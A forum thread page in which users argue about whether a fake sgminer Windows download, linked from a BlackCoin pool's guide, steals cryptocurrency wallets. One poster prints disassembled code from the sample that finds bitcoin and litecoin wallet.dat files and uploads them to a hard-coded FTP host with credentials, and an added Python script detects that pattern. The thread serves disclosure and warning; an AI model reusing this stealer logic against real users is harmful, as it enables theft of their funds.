
Topic: ALERT! sgminerwindows.com Stealing Bitcoins! - page 4. (Read 13568 times)

sr. member
Activity: 336
Merit: 250
It's not an admin account; you can't view folders or files. Using the Mozilla FTP, it's quite possibly his home FTP server though.
full member
Activity: 139
Merit: 103
Never use a pool that requires you to use their own software, or software they advise you to use. Keep with what is known; if their pool does not work with the known trusted mining software, do not use that pool.

Someone must have fixed up those links on blackcoinpool.com. I know for a fact that those were working correctly about 7 weeks ago when I downloaded the miner and it pointed to the correct site.

Edit:
Nvm, should have read on to page two. If this is all true then God knows how many people are affected by this. I do however still have a version of sgminer on my system and I highly doubt this has ever sent anything out to a 3rd party such as an FTP.

Edit 2:
Quote
ldstr    "http://ftp://212.48.76.120/"
    ldstr    "medusaminer"
    ldstr    "barkleys"

Wouldn't this mean any of us could log-on to that ftp right now  and snatch any dat files that might be there?
sr. member
Activity: 336
Merit: 250
It's not even the miner, it has no mining code in it. It just uses some basic FTP commands and sends the wallet.dat files to the above listed FTP.
member
Activity: 105
Merit: 10
  Not taking from your site, FROM YOUR GETTING STARTING WINDOWS MINER LINK!!! 

It is hard for the pool operator to monitor 3rd party links.
They might be virus free when being checked by the pool operator, and get changed the next moment.
newbie
Activity: 18
Merit: 0
If that is true, wouldn't that be the miner's fault, rather than Blackcoin?
sr. member
Activity: 336
Merit: 250
Sorry, I can't screenshot without the 2nd monitor window half. It's in the getting started windows miner link, sgminerwindows.com, the 4.4.2 miner download link. Should be able to click the image and click the magnifying glass in Photobucket to blow it up. The file in the zip is titled sgminer.exe and is 383kb.
sr. member
Activity: 336
Merit: 250
Please do, I am NOT OP! If you run the pool you should take the complaint seriously; here is another screenshot of the file taken apart. Not taking from your site, FROM YOUR GETTING STARTING WINDOWS MINER LINK!!!
member
Activity: 106
Merit: 10
Oh you meant the link to download the SGminer...
I thought you meant the link to Sgminer's website from our pool...

The picture is still not expandable and unreadable, I'm going to investigate as well...

This does not change the fact that it is not blackcoinpool.com or anything to do with Black Coin, and if true, something that we thank you for pointing out.
member
Activity: 74
Merit: 10
member
Activity: 106
Merit: 10
You are now backtracking and changing what you said...

Originally you stated that you downloaded SGminer4.x and took it apart to find the "code that steals BTC"

Now we post github of SGminer and you say it is in the link? What?

Are you just trying to trick people who do not know anything about code or mining into FUD?

sr. member
Activity: 336
Merit: 250
Fine, I'll do all the work for you guys; the linked code on GitHub is obviously not the code in the bad link! Here are some code samples from the file:
    call     string [mscorlib]System.String::Concat(string, string)
    call     class [mscorlib]System.IO.DirectoryInfo [mscorlib]System.IO.Directory::CreateDirectory(string)
    pop
    ldstr    "http://ftp://212.48.76.120/"
    ldstr    "medusaminer"
    ldstr    "barkleys"
    newobj   instance void ftp::.ctor(string hostIP, string userName, string password)
    stloc.1
    newobj   instance void [mscorlib]System.Random::.ctor()
    stloc.2
    ldloc.2
    ldc.i4.0

    nop
    ldloc.0
    ldstr    "\\bitcoin"
    call     string [mscorlib]System.String::Concat(string, string)
    call     bool [mscorlib]System.IO.Directory::Exists(string)
    ldc.i4.0
    ceq
    ldstr    "\\bitcoin\\wallet.dat"
    call     string [mscorlib]System.String::Concat(string, string)
    callvirt instance void ftp::upload(string remoteFile, string localFile)
    nop
    nop

loc_B8C:                                // CODE XREF: Upload+A6

    ldstr    "\\litecoin\\wallet.dat"
    call     string [mscorlib]System.String::Concat(string, string)
    call     bool [mscorlib]System.IO.File::Exists(string)
    ldc.i4.0
    ceq
    stloc.s  8
    ldloc.s  8
    brtrue.s loc_C14
    nop

screenshot because I know you don't believe me :
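Added example, not part of the original posts and not code from the file under discussion: a static triage check for the pattern visible in the disassembly above, wallet.dat paths sitting next to a hard-coded upload endpoint in a binary that claims to be a miner. It relies on .NET storing `ldstr` literals as UTF-16LE; the sample bytes, the 192.0.2.10 documentation address and the mining-marker list are constructed assumptions.

```python
import re

# .NET stores `ldstr` literals as UTF-16LE in the #US metadata heap, so an
# ASCII-only `strings` pass misses them. Match runs of 6+ printable chars.
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")
WALLET_REF = re.compile(r"wallet\.dat", re.I)
REMOTE_URL = re.compile(r"(?:ftp|https?)://[^\s\"']+", re.I)
# Assumed heuristic: markers a real stratum/OpenCL miner would normally carry.
MINING_MARKERS = (b"stratum+tcp", b"opencl")


def utf16_strings(blob: bytes) -> list[str]:
    return [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(blob)]


def triage(blob: bytes) -> dict:
    strings = utf16_strings(blob)
    wallets = [s for s in strings if WALLET_REF.search(s)]
    remotes = [u for s in strings for u in REMOTE_URL.findall(s)]
    ascii_view = blob.lower()
    utf16_view = "\n".join(strings).lower().encode()
    mining = any(m in ascii_view or m in utf16_view for m in MINING_MARKERS)
    return {
        "wallet_refs": wallets,
        "remote_endpoints": remotes,
        "mining_markers": mining,
        # Wallet paths next to a hard-coded remote endpoint is the pattern in
        # the disassembly; missing mining markers adds weight to the finding.
        "suspicious": bool(wallets and remotes),
    }


def us_entry(text: str) -> bytes:
    """Constructed #US-style entry: length byte, UTF-16LE data, flag byte."""
    data = text.encode("utf-16-le")
    return bytes([len(data) + 1]) + data + b"\x00"


# Constructed sample, not the real file.
SAMPLE = b"MZ\x90\x00" + b"\x00" * 16 + b"".join(us_entry(s) for s in (
    "http://ftp://192.0.2.10/",
    "\\bitcoin\\wallet.dat",
    "\\litecoin\\wallet.dat",
    "sgminer",
))

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

A hit is a reason to keep the file off any machine holding wallets and to compare its hash against the release published by the upstream project; it is not proof on its own.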



member
Activity: 74
Merit: 10
I run www.blackcoinpool.com

https://github.com/veox/sgminer <<< if you took it apart, you would have no problem pointing it out in the code.

sgminer is not required to use Black Coin Pool, it's just a common mining software that people use, so we posted up a tutorial.
If someone posts some viable proof, other than "I did it, believe me" I will gladly remove any mention of SGminer from the pool.
But out of the thousands of people that have used the pool, and the thousands upon thousands of people who use SGMiner, only you seem to be "getting hacked."

No proof of anything other than showing a transaction from a wallet, and then posting your address asking for donations while deleting posts from this forum.
member
Activity: 106
Merit: 10
Again here is a link to virus scans:
https://www.virustotal.com/en/file/f993b578fa9e715f1fee5063b31b2c16686e26774771f98cf2850600bfc29ef5/analysis/

I also have gone out of my way to contact this person and email them and get a hold of them
They just quit IRC or won't respond

And even if, hypothetically, Sgminer had a virus, that is not as the title claims Blackcoinpool.com
newbie
Activity: 28
Merit: 0
yeah I know bro, it was so stupid of me, I was not paying attention....and I'm very sad about it. If someone wants to help me a little this is my new btc address 1HwERQLFH4wxHiikQkbP899YEhhB7tFHN

It's definitely a virus and steals around 10 wallet files .... I took apart the windows 4.2.2 wallet.

I would highly doubt that.  

What virus do you have.  If it was an infection it should be detectable.  How did it steal 10 wallets.. sounds like a keystroke cap. virus..

Not a lot of proof here to me.

I like clambakes.. but never have went to them or can eat clams.. is that true.. ?
member
Activity: 106
Merit: 10

Has never mined with Black Coin Pool...
sr. member
Activity: 336
Merit: 250
He's not a troll; as I said, I reverse engineered the file and it is definitely a wallet stealer. Blackcoinpool.com links directly to the site for a windows miner in getting started. If you're sure he is a troll, download the windows miner and run it, then lose all of your wallets.
member
Activity: 106
Merit: 10
The title to this thread is misleading and wrong.

He is claiming SGminer stole his BTC, not the pool

He has never mined on the pool before.

SGminer is a separate website than BlackCoinPool
sr. member
Activity: 299
Merit: 250
Biggest altcoin multipool in existence installs a virus to steal users' bitcoin. One person complains while asking for donations to get back on his feet. Seems legit.
member
Activity: 106
Merit: 10
member
Activity: 106
Merit: 10
All you showed was a BTC transaction...

The miner you downloaded had nothing to do with Black Coin.

I run the pool for Black Coin and this person has never mined with us; he posted in IRC and I tried to help him and he quit.
I took it upon myself and searched for his username to find an email and emailed him trying to see what the issue was.
Within that 5 min he had a post on this thread.

This is FUD and a troll.

He had the same exact thread with multiple talking and he deleted it cuz he was discredited